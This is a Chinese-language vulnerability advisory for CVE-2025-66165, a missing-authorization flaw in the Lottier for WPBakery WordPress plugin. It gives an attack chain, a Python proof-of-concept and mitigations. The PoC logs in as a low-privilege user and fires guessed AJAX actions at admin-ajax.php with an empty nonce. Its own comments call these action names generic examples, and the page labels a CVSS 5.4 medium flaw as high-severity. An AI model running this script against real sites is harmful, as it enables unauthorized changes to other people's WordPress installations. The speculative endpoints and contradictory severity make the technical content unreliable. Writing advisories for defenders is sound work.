CVE-2025-66165 WordPress Lottier WPBakery插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-66165

漏洞类型

缺失授权/访问控制

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Lottier for WPBakery (lottier-wpbakery)

漏洞概述

CVE-2025-66165是WordPress插件Lottier for WPBakery中的一个高危安全漏洞，属于缺失授权（Missing Authorization）类型。该漏洞允许具有低权限的用户（如订阅者角色）绕过正常的访问控制检查，执行本应仅限管理员才能进行的操作。Lottier for WPBakery是一款流行的WordPress动画图标插件，为WPBakery页面构建器提供Lottie动画支持。由于该插件在多个关键功能点缺少权限验证，攻击者可以利用此漏洞进行横向权限提升，访问或修改其他用户的数据，甚至可能获取管理员权限。此漏洞影响版本从插件初始发布直至1.1.7版本，CVSS评分5.4（中等严重程度），意味着该漏洞在实际利用中需要一定的攻击条件，但仍对使用该插件的网站构成实质性威胁。建议所有使用该插件的用户立即检查并更新至最新版本，或采取临时缓解措施。

技术细节

该漏洞的根本原因在于Lottier for WPBakery插件在处理用户请求时未能正确实施基于角色的访问控制（RBAC）。具体表现为：插件的多个AJAX端点和管理员功能缺少current_user_can()或同等权限检查函数。这允许任何已认证用户（即使是最低权限的订阅者角色）向WordPress发送请求，触发本应仅管理员可访问的功能。攻击者可以通过构造特定的POST请求，利用wp-admin/admin-ajax.php端点调用这些未受保护的函数。例如，插件可能允许用户通过某个AJAX动作修改Lottie动画配置、导入恶意动画文件或更改全局设置。攻击者利用此漏洞可实现以下操作：1）读取敏感配置信息；2）修改站点设置；3）植入存储型XSSPayload（如果结合其他漏洞）；4）在某些配置下可能实现远程代码执行。此漏洞属于OWASP Top 10中的A01:2021 - Broken Access Control类别，是WordPress插件中最常见的安全问题类型之一。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站是否使用Lottier for WPBakery插件，可通过网站源码、Wappalyzer或直接访问/wp-content/plugins/lottier-wpbakery/目录进行确认

STEP 2

步骤2: 获取低权限账户

攻击者注册一个普通用户账户（订阅者角色）或利用已有的低权限账户登录WordPress系统

STEP 3

步骤3: 识别未授权访问点

通过代码审计或自动化工具识别插件中缺少current_user_can()验证的AJAX端点和管理功能

STEP 4

步骤4: 构造恶意请求

攻击者构造包含目标函数和参数的POST请求，绕过客户端验证直接发送到wp-admin/admin-ajax.php或admin-post.php

STEP 5

步骤5: 执行未授权操作

服务器端因缺少权限检查而执行请求，可能修改插件设置、导入恶意内容或泄露敏感信息

STEP 6

步骤6: 权限提升/持久化

根据具体漏洞利用结果，攻击者可能创建管理员账户、上传恶意插件或植入后门实现持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66165 PoC - Lottier for WPBakery Broken Access Control
# Description: Missing Authorization in Lottier for WPBakery <= 1.1.7
# This PoC demonstrates how a low-privilege user can exploit the missing authorization

import requests
import sys
from urllib.parse import urljoin

def exploit_cve_2025_66165(target_url, username, password):
    """
    Exploit the missing authorization vulnerability in Lottier for WPBakery plugin.
    A low-privilege user can perform admin-only actions.
    """
    # Setup session
    session = requests.Session()
    
    # WordPress login
    login_url = urljoin(target_url, 'wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    print(f'[*] Logging in as {username}...')
    response = session.post(login_url, data=login_data, cookies={'wordpress_test_cookie': 'WP+Cookie+check'})
    
    if 'loggedout' in response.text or response.status_code != 200:
        print('[-] Login failed')
        return False
    
    print('[+] Login successful')
    
    # Identify vulnerable AJAX actions (generic examples - specific actions depend on plugin version)
    # Common vulnerable endpoints in Lottier plugin
    vulnerable_actions = [
        'lottier_save_settings',
        'lottier_import_animation',
        'lottier_save_animation',
        'lottier_delete_animation'
    ]
    
    ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php')
    
    for action in vulnerable_actions:
        print(f'[*] Testing action: {action}')
        
        # Construct exploit payload
        # This varies based on the specific vulnerable function
        exploit_data = {
            'action': action,
            'nonce': '',  # If nonce is missing or can be brute-forced
            # Additional parameters depend on the specific vulnerability
        }
        
        response = session.post(ajax_url, data=exploit_data)
        
        if response.status_code == 200 and 'success' in response.text.lower():
            print(f'[+] Action {action} executed successfully - vulnerability confirmed!')
            print(f'[>] Response: {response.text[:200]}')
            return True
    
    print('[-] No vulnerable actions found or exploit failed')
    return False

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print('Usage: python cve_2025_66165_poc.py <target_url> <username> <password>')
        print('Example: python cve_2025_66165_poc.py http://example.com/ subscriber password123')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_cve_2025_66165(target, user, pwd)

影响范围

Lottier for WPBakery <= 1.1.7

防御指南

临时缓解措施

在无法立即升级插件的情况下，可采取以下临时缓解措施：1）使用WordPress安全插件如Wordfence或Sucuri启用虚拟补丁；2）通过.htaccess或Nginx配置限制非管理员访问/wp-admin/admin-ajax.php中与lottier相关的动作；3）暂时禁用或删除Lottier for WPBakery插件直至安全更新发布；4）使用会员插件限制网站注册功能，仅允许受信任用户注册；5）加强服务器访问控制，限制对wp-admin目录的访问来源IP。